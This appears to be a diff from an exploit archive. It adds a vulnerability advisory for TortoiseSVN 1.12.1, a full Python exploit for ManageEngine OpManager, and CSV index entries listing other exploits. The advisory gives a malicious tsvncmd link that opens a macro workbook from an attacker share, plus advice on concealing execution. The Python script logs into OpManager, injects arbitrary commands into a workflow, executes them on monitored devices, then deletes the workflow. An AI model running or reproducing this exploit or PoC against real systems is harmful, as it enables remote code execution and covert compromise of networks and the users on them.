 It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and
 easy user interface for Subversion.
 It is developed under the GPL. Which means it is completely free for
 anyone to use, including in a commercial
 environment, without any restriction. The source code is also freely
 available, so you can even develop your
 own version if you wish to. Since it's not an integration for a specific
 IDE like Visual Studio, Eclipse or
 others, you can use it with whatever development tools you like, and
 with any type of file.
 (Copy of the about page: https://tortoisesvn.net/about.html )
 Abstract Advisory Information:
 ==============================
 A vulnerability laboratory researcher (vxrl team) discovered a remote
 code execution vulnerability in the TortoiseSVN v1.12.1 software.
 Vulnerability Disclosure Timeline:
 ==================================
 2019-08-13: Public Disclosure (Vulnerability Laboratory)
 Affected Product(s):
 ====================
 TortoiseSVN
 Product: TortoiseSVN - Software 1.12.1
 Discovery Status:
 =================
 Published
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 High
 Authentication Type:
 ====================
 Pre auth - no privileges
 User Interaction:
 =================
 Low User Interaction
 Disclosure Type:
 ================
 Independent Security Research
 Technical Details & Description:
 ================================
 A remote code execution vulnerability has been uncovered in the official
 TortoiseSVN v1.12.1 software.
 The vulnerability typ allows remote attackers to execute arbitrary codes
 to compromise a target computer system.
 The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff
 operation on Excel workbooks, which could be used to open remote
 workbooks without protection from macro security settings to execute
 arbitrary code.
 The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a
 customised diff on [file1] and [file2] based on the file extension.
 For xls files, it will execute the script `diff-xls.js` using wscript,
 which will open the two files for analysis without any macro
 security warning. An attacker can exploit this by putting a macro virus
 in a network drive, and force the victim to open the workbooks
 and execute the macro inside. Since the macro is triggered through
 wscript, to make the attack less visible, one could kill the wscript
 process and quit the excel program after the code was executed.
 Proof of Concept (PoC):
 =======================
 The vulnerability could be triggered by visiting a specially crafted URL
 via web browser.
 To reproduce the vulnerability, one could simply create a .url file or
 open the URL with a browsers,
 but a notification prompt may be shown for the latter case.
 <a
 href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'>Checkout
 the Repo with TortoiseSVN</a>
 where VBoxSvrv is the remote network drive controlled by the attacker,
 v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.
 Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar
 Password: 23vxrl23
 PoC: Video
 https://www.youtube.com/watch?v=spvRSC377vI
 Security Risk:
 ==============
 The security risk of the remote code execution vulnerability in the
 software component is estimated as high.
 Credits & Authors:
 ==================
 PingFanZettaKe [VXRL Team] -
 https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without
 any warranty. Vulnerability Lab disclaims all warranties,
 either expressed or implied, including the warranties of merchantability
 and capability for a particular purpose. Vulnerability-Lab
 or its suppliers are not liable in any case of damage, including direct,
 indirect, incidental, consequential loss of business profits
 or special damages, even if Vulnerability-Lab or its suppliers have been
 advised of the possibility of such damages. Some states do
 not allow the exclusion or limitation of liability for consequential or
 incidental damages so the foregoing limitation may not apply.
 We do not approve or encourage anybody to break any licenses, policies,
 deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
 www.vulnerability-db.com
 Services:   magazine.vulnerability-lab.com
 paste.vulnerability-db.com 			infosec.vulnerability-db.com
 Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
 youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php
 vulnerability-lab.com/rss/rss_upcoming.php
 vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php
 vulnerability-lab.com/register.php
 vulnerability-lab.com/list-of-bug-bounty-programs.php
--- a/exploits/windows/webapps/47255.py
+++ b/exploits/windows/webapps/47255.py
@ -0,0 +1,266 @@
 #!/usr/bin/env python3
 # Exploit Title: ManageEngine opManager Authenticated Code Execution
 # Google Dork: N/A
 # Date: 08/13/2019
 # Exploit Author: @kindredsec
 # Vendor Homepage: https://www.manageengine.com/
 # Software Link: https://www.manageengine.com/network-monitoring/download.html
 # Version: 12.3.150
 # Tested on: Windows Server 2016
 # CVE: N/A
 import requests
 import re
 import random
 import sys
 import json
 import string
 import argparse
 C_WHITE = '\033[1;37m'
 C_BLUE = '\033[1;34m'
 C_GREEN = '\033[1;32m'
 C_YELLOW = '\033[1;33m'
 C_RED = '\033[1;31m'
 C_RESET = '\033[0m'
 LOGIN_FAIL_MSG = "Invalid username and/or password."
 def buildRandomString(length=10):
 	letters = string.ascii_lowercase
 	return ''.join(random.choice(letters) for i in range(length))
 def getSessionData(target, user, password):
 	session = requests.Session()
 	session.get(target)
 	# Login Sequence
 	randSid = random.uniform(-1,1)
 	getParams = { "requestType" : "AJAX" , "sid" : str(randSid) }
 	postData = { "eraseAutoLoginCookie" : "true" }
 	session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams )
 	postData = { "loginFromCookieData" : "false",
 						 "ntlmv2" : "false", 
 						 "j_username" : user,
 						 "j_password" : password 
 						}
 	initialAuth = session.post( url = target + "/j_security_check", data = postData ) 
 	if LOGIN_FAIL_MSG in initialAuth.text:
 		print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.")
 		sys.exit(1)
 	elif initialAuth.status_code != 200:
 		print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.")
 		sys.exit(1)
 	apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text)
 	apiKey = apiKeyReg.group(0).split('"')[1]
 	return { "session" : session , "apiKey" : apiKey }
 def getDeviceList(target, session, apiKey):
 	deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } )
 	devices = {}
 	devicesJsonParsed = json.loads(deviceList.text)
 	for row in devicesJsonParsed["rows"]:
 		devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ]
 	return devices
 def buildTaskWindows(target, session, apiKey, device, command):
 	# Build Task
 	taskName = buildRandomString()
 	workFlowName = buildRandomString(15)
 	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
 	jsonData += '"' + taskName + '"'
 	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" 
 	jsonData += '"' + command + '"'
 	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
 	jsonData += '"' + workFlowName + '"' 
 	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
 	jsonData += '"' +  device + '"' 
 	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
 	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
 	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
 	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
 	if "has been created successfully" in makeWorkFlow.text:
 		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
 	else:
 		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
 		sys.exit(1)
 	return workFlowName
 def buildTaskLinux(target, session, apiKey, device, command):
 	taskName = buildRandomString()
 	workFlowName = buildRandomString(15)
 	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
 	jsonData += '"' + taskName + '"'
 	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" 
 	jsonData += '"' + command + '"'
 	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
 	jsonData += '"' + workFlowName + '"' 
 	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
 	jsonData += '"' +  device + '"' 
 	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
 	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
 	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
 	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
 	if "has been created successfully" in makeWorkFlow.text:
 		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
 	else:
 		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
 		sys.exit(1)
 	return workFlowName
 # Get the ID of the newly created workflow
 def getWorkflowID(target, session, apiKey, workflowName):
 	getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey })
 	rbID = -100
 	workflowJsonParsed = json.loads(getID.text)
 	for wf in workflowJsonParsed:
 		if wf['name'] == workflowName:
 			rbID = wf['rbID'] 
 	if rbID == -100: 
 		print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...")
 		sys.exit(1)
 	return rbID
 def getDeviceID(target, session, apiKey, rbID, device):
 	getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID })
 	wfDevicesJsonParsed = json.loads(getDevices.text)
 	wfDevices = wfDevicesJsonParsed["defaultDevices"]
 	deviceID = list(wfDevices.keys())[0]
 	return deviceID
 def runWorkflow(target, session, apiKey, rbID, device):
 	targetDeviceID = getDeviceID(target, session, apiKey, rbID, device)
 	print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .")
 	workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 }	)
 	if re.match(r"^\[.*\]$", workflowExec.text.strip()):
 		print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!")
 	else:
 		print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.")
 		sys.exit(1)
 	deleteWorkflow(target, session, apiKey, rbID)
 	print(f"{C_GREEN}[+]{C_RESET} Exploit complete!")
 def deleteWorkflow(target, session, apiKey, rbID):
 	print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .")
 	delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID })
 def main():
 	parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.")
 	parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)")
 	parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.")
 	parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.")
 	parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.")
 	args = parser.parse_args()
 	insufficient_args = False
 	if not args.u:
 		print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.")
 		insufficient_args = True
 	if not args.t:
 		print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.")
 		insufficient_args = True
 	if not args.p:
 		print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.")
 		insufficient_args = True
 	if not args.c:
 		print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.")
 		insufficient_args = True
 	if insufficient_args:
 		sys.exit(1)
 	sessionDat = getSessionData(args.t, args.u, args.p)
 	session = sessionDat["session"]
 	apiKey = sessionDat["apiKey"]
 	devices = getDeviceList(args.t, session, apiKey)
 	# if there's only one device in the OpManager instance, default to running commands on that device;
 	# no need to ask the user.
 	if len(devices.keys()) == 1:
 		device = list(devices.keys())[0]
 	else:
 		print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:")
 		print("")
 		counter = 1
 		for key in devices.keys():
 			print(f"   {counter}: {key} ({devices[key][0]}) ({devices[key][1]})")
 		print("")
 		while True:
 			try:
 				prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: "
 				devSelect = int(input(prompt))
 			except KeyboardInterrupt:
 				sys.exit(1)
 			except ValueError:
 				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
 				sys.exit(1)
 			if devSelect < 1 or devSelect > len(list(devices.keys())):
 				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
 				sys.exit(1)
 			else:
 				device = list(devices.keys())[counter - 1]
 				break
 	# don't hate, it works doesn't it?
 	if "indows" in devices[device][1]:
 		workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c)
 	else:
 		workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c)
 	workflowID =  getWorkflowID(args.t, session, apiKey, workflowName)
 	runWorkflow(args.t, session, apiKey, workflowID, device)
 main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6525,6 +6525,8 @@ id,file,description,date,author,type,platform,port
 47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
 47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
 47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
 47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows,
 47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10632,6 +10634,7 @@ id,file,description,date,author,type,platform,port
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17606,6 +17609,7 @@ id,file,description,date,author,type,platform,port
 47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
 47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
 47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41606,3 +41610,11 @@ id,file,description,date,author,type,platform,port
 47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
 47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
 47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
 47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80
 47235,exploits/php/webapps/47235.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell",2019-08-12,xerubus,webapps,php,
 47247,exploits/php/webapps/47247.txt,"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting",2019-08-14,"Ilca Lucian Florin",webapps,php,80
 47249,exploits/php/webapps/47249.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection",2019-08-14,qw3rTyTy,webapps,php,80
 47250,exploits/hardware/webapps/47250.rb,"D-Link DIR-600M - Authentication Bypass (Metasploit)",2019-08-14,"Devendra Singh Solanki",webapps,hardware,80
 47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
 47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
 47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,